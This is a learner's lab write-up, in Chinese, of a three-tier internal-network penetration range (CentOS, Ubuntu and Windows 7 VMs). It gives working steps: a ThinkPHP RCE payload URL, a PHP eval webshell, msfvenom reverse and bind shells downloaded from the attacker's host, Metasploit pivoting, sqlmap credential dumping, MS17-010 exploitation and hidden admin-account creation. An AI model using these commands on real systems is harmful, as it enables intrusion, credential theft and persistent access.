CFS三层靶机-内网环境渗透

<1>靶场介绍及环境配置

三个主机的网络环境拓扑图，攻击机的网段在192.168.236.0/24，三台靶机的IP地址分别如图：

上面的 Target1、2、3分别对应CentOS7、Ubuntu、Windows7 三台主机。

(1)网卡配置

注意：在编辑虚拟网卡的时候，不要勾选红圈那个选项，否则后面代理就就没有意义了。.ova文件导入到VM之后可以打开虚拟机，使用root:teamssix.com登录主机，通过ifconfig检查网络情况是否正常。

(2)宝塔配置

其中Target1和Target2主机需要我们自己去宝塔后台配置一下（靶机描述信息里有密码 root:teamssix.com）：
进入宝塔面板，选择网站，再点击网站名，将centos靶机中c段为236的那个ip添加进去，确保能够访问到对应的web页面

<2>Target1

(1)nmap扫描存活主机

#扫描段内存活主机
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.236.0/24   
Nmap scan report for 192.168.236.141 (192.168.236.141)
Host is up (0.00019s latency).

#nmap扫描一下 Target1 开放的服务
┌──(root㉿kali)-[~]
└─# nmap -A -p 1-65535 192.168.236.141
Nmap scan report for 192.168.236.141 (192.168.236.141)
Host is up (0.00082s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Pure-FTPd
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    nginx
111/tcp  open  rpcbind 2-4 (RPC #100000)
888/tcp  open  http    nginx
3306/tcp open  mysql   MySQL (unauthorized)
8888/tcp open  http    Ajenti http control panel
MAC Address: 00:0C:29:61:BA:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

可以看见开放了 21、22、80、111等等端口，我们访问一下80的http服务
访问192.168.236.141 站点不存在，192.168.236.141/index.php 404 是因为宝塔后台配置的原因，按照前面提到的宝塔配置之后就不会出现这个情况。

(2)利用thinkphp-5.0.22 RCE漏洞拿shell

访问80端口开放的http服务

访问后发现这是一个用thinkphp5版本搭建的网站，thinkphp5版本是有漏洞的，这里我们直接上thinkphpGUI工具，检测一下，发现存在ThinkPHP 5.0.22/5.1.29 RCE

poc为：http://192.168.236.141/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

直接GetShell没通，无伤大雅，那我们执行命令去生成一个一句话木🐎(执行反弹shell命令也可)

echo "<?php eval($_POST['1vxyz']); ?>" > shell.php

但是蚁剑连接失败，查看一下shell.php 发现内容中$_POST被过滤了

这个好说，base64加密绕过

echo "PD9waHAgZXZhbCgkX1BPU1RbJzF2eHl6J10pOyA/Pg==" | base64 -d > shell.php

成功写入一句话木🐎，蚁剑连接
在 flag21sA.txt和robots.txt 得到了两个flag

拿到shell之后，执行ifconfig，发现了另一个22网段ip：192.168.22.130。肯定就存在内网了

(3)上传msf后门(reverse_tcp)反向连接拿主机权限

既然存在内网，那就要拿出来我们的msf美少妇工具了
首先利用 msfevnom 生成一个msf后门，即elf的🐎

# 生成msf后门  其中lhost为kali_ip
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.236.128 lport=4444 -f elf > shell.elf
#kali里python开一个http服务  用于蚁剑 wget下载 msf后门
python -m http.server 8888
# 蚁剑进入到可以下载文件的 /tmp目录
wget http://192.168.236.128:8888/shell.elf
# 赋予执行权限
chmod +x shell.elf
#在kali中运行监听模块
root@kali:~# msfconsole
msf6 > use exploit/multi/handler
msf6 > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.236.128
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run

#然后回到蚁剑 /tmp下 ./执行 elf木马
./shell.elf

到这里我们的Target1：centos靶机已经上线 msf 了，下面开始内网渗透

<3>Target2

现在还不能直接去nmap扫描内网里的ubuntu靶机ip，因为我们的网段设置，这里扫描是用的kali的ip扫描，模拟的环境中kali和centos是NAT下的同一个网段的公网主机，所以可以直接扫到，而现在扫的属于内网网段。 但是我们知道刚打下的centos是内网里的，因此我们需要挂上centos靶机的代理。

(1)路由信息探测

我们使用msf自带的 探测网络接口的模块（get_local_subnets）查看路由的模块(autoroute -p)来进一步进行信息探测

# 获取本地所在子网信息，可以看到存在22网段
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.22.0/255.255.255.0
Local subnet: 192.168.236.0/255.255.255.0
# 查看路由信息，会发现还没有路由
meterpreter > run autoroute -p
[*] No routes have been added yet

路由：路由是指路由器从一个接口上收到数据包，根据数据包的目的地址进行定向并转发到另一个接口的过程，就相当于把我们要传输的数据先传输到该路由，再发往目标，我们可以通过设置路由的方式把我们的请求从centos网段发出，这样msf不就可以与22网段互通有无了吗），所以我们要来添加一个路由(autoroute -s)

静态路由配置

MSF 的 autoroute 模块是 MSF 框架中自带的一个路由转发功能，实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由，直接使用 MSF 去访问原本不能直接访问的内网资源，只要路由可达我们既可使用 MSF 来进行探测了

#通过meterpreter添加22网段的路由信息，这样kali与centos就可以互通了
run autoroute -s 192.168.22.0/24
run autoroute -p
#这一步也可以使用run post/multi/manage/autoroute自动添加路由
run post/multi/manage/autoroute

(2)msf的代理配置

路由还有一个缺陷，它只能在这个msf建立的会话上使用，假如我们新开一个终端使用nmap扫描，还是扫不到，所以我们需要去进行 msf的代理配置。

msf有自己的代理模块，就是 auxiliary/server/socks_proxy ，我们先来开启代理服务，srvport端口随便，没被占用就行

# 先切到控制台
background
# 配置socks5代理
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
msf6 auxiliary(server/socks_proxy) > set srvport 2222
msf6 auxiliary(server/socks_proxy) > run

在kali中，通过vim /etc/proxychains4.conf修改proxychains配置文件：

写入： kali的ip和刚刚设置的端口

socks5 192.168.236.128 2222

扫描靶机2 ubuntu的ip及其服务

可以用nmap扫描存活主机，也可以利用msf进行第二层网络存活主机扫描：

use auxiliary/scanner/discovery/arp_sweep

root@kali:~# proxychains4 nmap -Pn -sT 192.168.22.129 -p80
-Pn：扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT：扫描TCP数据包已建立的连接connect

能探测乌班图的端口，说明代理配置成功（前面的终端页面都不要关，路由必须设置才可以成功）

访问80端口开放的http服务，设置好浏览器代理后，访问看看

显示站点不存在，ubuntu这个靶机也需要去宝塔，把c段为22的 192.168.236.129添加进去

(3)利用bagecms-sql注入漏洞,admin登录后台拿shell

配置完毕后访问，是一个bagecms搭建的平台

源码中给出了sql注入提示：Hint：SQL注入点：/index.php?r=vul&keyword=1
/robots.txt 也给出了admin登录点 ： /admini

靶场，不用在意那么多，直接sqlmap一把梭,因为需要挂代理才能访问到，所以命令前需要加上 proxychains4，同样 sqlmap也可以用参数 –proxy=socks5://192.168.236.128:2222
keyword为注入点，所以可以在执行时加上 -p keyword 更快一点

# 爆一下数据库名称
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword --dbs
或
sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks5://192.168.236.128:2222 -p keyword --dbs --batch
# 爆破 bagecms 库下的表
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D "bagecms" --tables T "bage_admin" --batch
# 爆破 bage_admin 表的字段
proxychains4 sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D "bagecms" -T "bage_admin" --columns --batch
# 把 admin的账号密码给 dump出来
proxychains4 sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
# 测试了--is-dba，不是高权限，那就不尝试--os-shell了

拿到admin的账号和密码 admin:123qwe

登录CMS的后台看一看有些什么，/index.php?r=/admini/

在首页就发现了flag

在模板一栏可以修改文件，在 tag/index.php 写入一句话🐎：

提交之后，打开蚁剑，设置代理 socks5为 kaliip为192.168.236.128 port为2222

也可以用 Sockscap挂上msf开启的socks5代理 在里面添加蚁剑程序打开蚁剑

注意这里的网址使用的是模块化，不能直接加在网站上，要用?r=模块文件 的方式访问模块文件，再用蚁剑连接

测试连接，写入成功

(3)上传msf后门(bind_tcp)正向连接拿ubuntu主机权限

然后和前面target1差不多，msf生成后门，上传到蚁剑 www/wwwroot/upload那个目录。不能通过wget了，好像是代理设置的原因，我是直接kali里生成，下载到windows上，然后上传文件上传上去的

# 生成一个正向连接后门（因为内网主机无法直接与本机通信，因此无法建立反向连接，需要本机通过代理连接到目标机）
# 蚁剑中 uname -a 可以看到这是一个64位的linux系统
msfvenom -p linux/x64/meterpreter/bind_tcp lport=3333 -f elf > shell2.elf
# 后门程序上传之后在Webshell执行命令
chmod +x shell2.elf
./shell2.elf

在MSF中开启监听，与Target2建立连接，这里需要注意，上一次代理使用的reverse_tcp是MSF作为监听，让Target1连到我们，而这次代理使用的bind_tcp是Target2作为监听，我们需要连到Target2，这个逻辑正好是相反的

同样，如果我们要用msf 另起一个终端开启监听，这里要注意，msf新开的终端之前的那个终端的配置都用不了。

然而这次代理使用的bind_tcp是Target2作为监听，我们要正向连接到内网里的target2，所以不能直接msfconsole打开，msf这里也需要走代理 ，就是在用 proxychains msfconsole来启动msf，再设置payload，设置rhost,lport run 即可开启监听 ……有点套娃

可以参考这个图好理解一些：

实际上继续用那个终端就行

# 本机MSF执行命令
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.22.129
set LPORT 3333
run

shell
# 转化为交互式
python -c 'import pty;pty.spawn("/bin/bash");'
# 查看网络信息
ifconfig

信息搜集，ifconfig看到了c段为33 的ip，还存在一个内网

还有一层内网？ 继续 msf，下面的操作就有点重复之前的操作了 确定内网c段 -> msf添加路由

<4>Target3

(1)路由信息探测

与之前一样，我们添加Target3的路由，由于还在那个终端里，auxiliary/server/socks_proxy正在执行，所以添加了新路由，也就可以访问新路由内网，这里就不用设置代理了，直接添加路由即可

#通过meterpreter添加33网段的路由信息，这样kali与ubuntu就可以互通了
run autoroute -s 192.168.33.0/24
run autoroute -p

nmap扫描一下target3靶机开放的服务

能探测乌班图的端口，说明代理配置成功（前面的终端页面都不要关，路由必须设置才可以成功）

(2)利用ms17-010永恒之蓝漏洞拿shell

必须添加路由。

可以看到 target3是 开放着445、3389端口的Win7系统，熟悉的永恒之蓝。msf里现成的ms17-010打一下

use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.33.33
set LPORT 6666
run

ms17-010漏洞利用成功，shell进入命令行

netstat -ant

发现网站开启了3389，同时是system权限：

还看见了我们的shell….

查看账户，直接修改账户密码。利用3389连接 或者 添加一个用户

net user administrator 123456
或
net user /add 1vxyz 123456
net localgroup administrators /add 1vxyz

win+r mstsc 打开远程桌面连接。在SocksCap中运行连接远程桌面程序mstsc.exe才可以，这里我电脑上没找到。还有一种方法

portfwd端口转发/映射

portfwd add -l 5555 -p 3389 -r 192.168.33.33

Win+r 输入mstsc

最后的flag就在这台win7的桌面上，至此靶场打穿，三个flag拿到

<5>总结

从最初的下载靶机，开启 到现在结束，断断续续统共花费了很多个小时。期间 连开四台虚拟机，有电脑卡的蓝屏动不了关机… 也有对宝塔配置、内网知识的不了解，跟着wp走却访问不了。还有途中不断解决问题时session一直掉，最后一步的远程桌面没打开等等。到后面一步一步啃完，也是学到了很多东西。

0.0 渗透小白终于打破 天天听说却不知道是什么东西，害怕没搞过搞不下来的想法，打下了第一个简单的内网靶场。后续抽时间继续深入学习，万事开头难，希望是一个好兆头，加油！

学到用到的一些东西：

• thinkphp-GUI，sqlmap工具
• msf后门制作 & msf 正向反向shell
• 路由的概念
• msf内网代理模块 & sockscap64代理工具
• ms17-010漏洞
• 跳板攻击之msf-portfwd端口转发
• 3389远程桌面登录

参考：内有靶机环境下载地方